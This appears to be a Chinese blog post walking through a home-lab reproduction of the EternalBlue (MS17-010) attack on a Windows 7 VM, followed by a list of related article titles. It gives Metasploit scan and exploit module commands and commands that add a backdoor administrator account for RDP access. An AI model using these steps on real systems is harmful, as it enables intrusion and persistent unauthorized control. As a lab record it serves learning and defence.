最近开始学习渗透,永恒之蓝漏洞很出名对此学习记录并且复现

所需环境VMware,两台主机使用NAT模式连接

kali 192.168.249.129
windows7 192.168.249.130

PING命令测试主机连接情况

当时发现kali单方ping不通win7,排查后需要先关闭win7防火墙

输入命令msfconsole 进入msf框架

命令search ms17-010 寻找ms17-010相关漏洞

这里前两个是辅助模块用来帮助探测主机是否存在该漏洞,后三个是利用模块

输入命令use auxiliary/scanner/smb/smb_ms17_010,show options 查看配置信息

输入命令set rhost 192.168.249.130 探测该目标

1.显示绿色说明该主机存在ms17-010漏洞
2.真实情况下使用命令扫描整个网段或使用nmap扫描

输入命令use exploit/windows/smb/ms17_010_eternalblue选择攻击模块并查看配置

反弹shell,获得权限

输入命令chcp 65501去除乱码

添加用户abc密码abc并把该用户加入用户组Administratos命令如下

net user abc abc /add
net localgroup Administrators abc /add

最后在kali上使用远程连接,命令如下

rdesktop 192.168.249.130
注:Widows 7 默认是不开启远程服务,自己测试时需要先启用远程功能

登录成功,复现结束

MSF-17010(永恒之蓝)复现相关推荐

  1. Metasploit渗透框架介绍及永恒之蓝复现

    Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...

  2. Win7经典漏洞永恒之蓝复现

    Win7经典漏洞永恒之蓝复现 环境 信息收集 确定漏洞 渗透 渗透成功后一些常用操作 环境 工具:metaspoilt 模拟攻击机ip:192.168.2.19 靶机ip:192.168.2.22 信 ...

  3. 利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击

    1. 永恒之蓝Eternalblue 攻击 Eternalblue 通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞 恶意代码会扫描开放445文件共享端口的Windows机器, ...

  4. MSF利用永恒之蓝渗透win2003

    1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...

  5. 永恒之蓝复现(win7/2008)

    Kali对Windows2008/7的MS17010漏洞测试(MSF自带模块)  0x01 说明 其实这个MSF自带的exp模块还是挺让人伤脑筋的,因为它支持的OS并不是很多,也就Windows S ...

  6. kali利用MSF对永恒之蓝漏洞入侵windows7

    warning 本文目的并不是教会学者入侵win7主机, 而是加强防范 kali入侵win7 步骤一:实验环境的搭建 攻击机:kali(2022.3版本) 靶机:win7 专业版 sp1 x64位 安 ...

  7. MS17-010(永恒之蓝)漏洞分析与复现

    文章目录 一.漏洞简介 1.永恒之蓝介绍: 2.漏洞原理: 3.影响版本: 二.漏洞复现 复现环境: 复现过程: 1.主机发现: 2.使用MSF的永恒之蓝漏洞模块 3.使用ms17-010扫描模块,对 ...

  8. MS17-010(永恒之蓝)漏洞复现

    漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机.只要用户主机开机联 ...

  9. 永恒之蓝 ms17_010漏洞

    复现环境: 攻击机:Linux kali(192.168.119.128) 靶机:Windows 7 x64(192.168.119.129) 实验条件:两台机子可以相互ping通,并且靶机(无补丁) ...

最新文章

  1. Ubuntu 18.04.1 搭建Java环境和HelloWorld
  2. docker nginx安装模块_docker安装nginx与php7.1
  3. 求数组中的最小值以及最小值的序列号
  4. 使用 js替换网页中的关键词为链接
  5. php连hiveservice2,hiveserver2启动成功但无法通过beeline连接
  6. AttributeError: 'Model' object has no attribute 'target_tensors'
  7. 使用Hibernate的JPA 2.0标准查询
  8. ftp linux包,图文详解Ubuntu搭建Ftp服务器的方法(包成功)
  9. 利用阈值分割原理,对给定图像编程实现二值、反二值、截断、反截断、大津阈值、自适应阈值等类型阈值图像分割,给出实现源码和结果图像。
  10. 宏定义 object-c 单例
  11. kali下搭建WiFi钓鱼热点
  12. kindeditor 文件上传在 spring mvc下的使用
  13. AAAI 2019 使用循环条件注意力结构探索回答立场检测任务
  14. Windows 7 通过无线网卡,模拟Wifi,实现手机,电脑等无线设备共享上网
  15. HKC PG27P3Q 评测
  16. Word限制编辑忘记密码怎么解锁
  17. 计算机应用基础第四章电子表格测试,2019年计算机应用基础第四章测试答案
  18. 传真百科:电子邮件能取代传真吗
  19. 【C++】内联函数是什么?内联和宏有什么区别?
  20. 【DSA_Fall2020】2. Trees (Templates in C)

热门文章

  1. 2022基金从业考试如何备考
  2. 【UEFI基础】Protocol介绍
  3. 淘宝/天猫平台API 接口及API文档
  4. 群发邮件平台你知道那个好吗,一款邮件群发100万封群发邮件平台
  5. 没有工作经验,没有的究竟是什么?
  6. 安全测试找工作没有经验怎么办?
  7. 将word 转换为图片(word to pdf ->pdf to image)
  8. 记一次docker进不去容器的经历
  9. 设置centos笔记本合盖不休眠
  10. HashMap源码探究